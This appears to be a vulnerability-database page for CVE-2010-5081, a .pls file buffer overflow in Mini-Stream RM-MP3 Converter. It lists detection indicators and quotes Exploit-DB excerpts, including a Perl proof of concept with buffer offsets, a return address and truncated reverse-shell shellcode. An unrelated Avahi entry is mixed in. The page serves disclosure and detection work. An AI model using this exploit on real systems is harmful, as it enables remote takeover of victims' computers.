CVE-2010-5081
published 2011-12-25CVE-2010-5081: Stack-based buffer overflow in Mini-Stream RM-MP3 Converter 3.1.2.1 allows remote attackers to execute arbitrary code via a long URL in a .pls file.
PriorityP353critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
31.37%
98.1th percentile
Stack-based buffer overflow in Mini-Stream RM-MP3 Converter 3.1.2.1 allows remote attackers to execute arbitrary code via a long URL in a .pls file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | rm-mp3_converter | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xCF\xDA\x05\x10
bytes↗
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff
- →Malicious .pls file contains a URL field starting with 'http://' followed by ~17417+ bytes of junk, triggering a stack buffer overflow in Mini-Stream RM-MP3 Converter 3.1.2.1 ↗
- →Look for abnormally large URL entries (>17000 bytes) inside .pls playlist files as an indicator of exploitation attempt ↗
- →ROP/return address 0x100371f5 (call ESP) in MSRMfilter03.dll at offset 17417 within the .pls URL field is the exploit pivot point; monitor for this value in memory or file content ↗
- →Alternative RET address 0x1005DACF (\xCF\xDA\x05\x10, jump to ESP from msrmfilter03.dll) used in the universal PoC; scan .pls files for this byte sequence ↗
- →Payload uses AlphanumUpper encoder with ECX as BufferRegister; encoded shellcode in .pls URL will be entirely uppercase alphanumeric — look for long runs of uppercase ASCII bytes after the RET address ↗
- →PrependEncoder stub bytes EB 03 59 EB 05 E8 F8 FF FF FF appear immediately before the alphanumeric shellcode in Metasploit-generated payloads for this exploit ↗
- →Bad characters for this exploit are \x00, \x09, \x0a (null, tab, newline); absence of these bytes in an otherwise long URL within a .pls file is consistent with crafted exploit content ↗
- ·Two different RET addresses are used across PoCs for the same DLL (MSRMfilter03.dll): 0x100371f5 (Metasploit module) vs 0x1005DACF (universal PoC by Madjix). Detection rules should cover both. ↗
- ·The Metasploit module uses offset 17417 while the universal PoC uses 17425 bytes of junk before the RET address; both target the same vulnerability but differ slightly in buffer layout. ↗
- ·The exploit is classified as local/fileformat (victim must open a crafted .pls file); there is no network-based delivery vector inherent to the vulnerability itself. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8w3p-v3w3-837j: Stack-based buffer overflow in Mini-Stream RM-MP3 Converter 3
ghsa_unreviewed·2022-05-17
CVE-2010-5081 [HIGH] CWE-119 GHSA-8w3p-v3w3-837j: Stack-based buffer overflow in Mini-Stream RM-MP3 Converter 3
Stack-based buffer overflow in Mini-Stream RM-MP3 Converter 3.1.2.1 allows remote attackers to execute arbitrary code via a long URL in a .pls file.
Red Hat
avahi: assertion failure after receiving a packet with corrupted checksum
vendor_redhat·2010-06-23·CVSS 5.0
CVE-2010-2244 [MEDIUM] avahi: assertion failure after receiving a packet with corrupted checksum
avahi: assertion failure after receiving a packet with corrupted checksum
The AvahiDnsPacket function in avahi-core/socket.c in avahi-daemon in Avahi 0.6.16 and 0.6.25 allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a DNS packet with an invalid checksum followed by a DNS packet with a valid checksum, a different vulnerability than CVE-2008-5081.
Package: avahi (Red Hat Enterprise Linux 6) - Not affected
No detection rules found.
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
exploitdb·2011-11-14
CVE-2010-5081 Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mini-Stream RM-MP3 Converter v3.1.2.1 (PLS File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3
Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim
opens the malicious PLS file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Madjix', # original discovery
'Tiago Henriques', # metasploit module
'James Fitts' # clean
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow Universal
exploitdb·2010-07-16
CVE-2010-5081 Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow Universal
Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow Universal
---
#Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow
universal
#By Madjix (lemail ma3andkoum madirou bih)
#Sec4ever.com
my $junk="http://"."\x41" x 17425;
my $ret = "\xCF\xDA\x05\x10"; #jump to ESP - from msrmfilter03.dll
my $padding = "\x90" x 24;
# windows/shell_reverse_tcp - 739 bytes
# http://www.metasploit.com
my $shellcode =
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41
Metasploit
Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow
metasploit
Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow
Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow
This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3 Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim opens the malicious PLS file.
2011-12-25
Published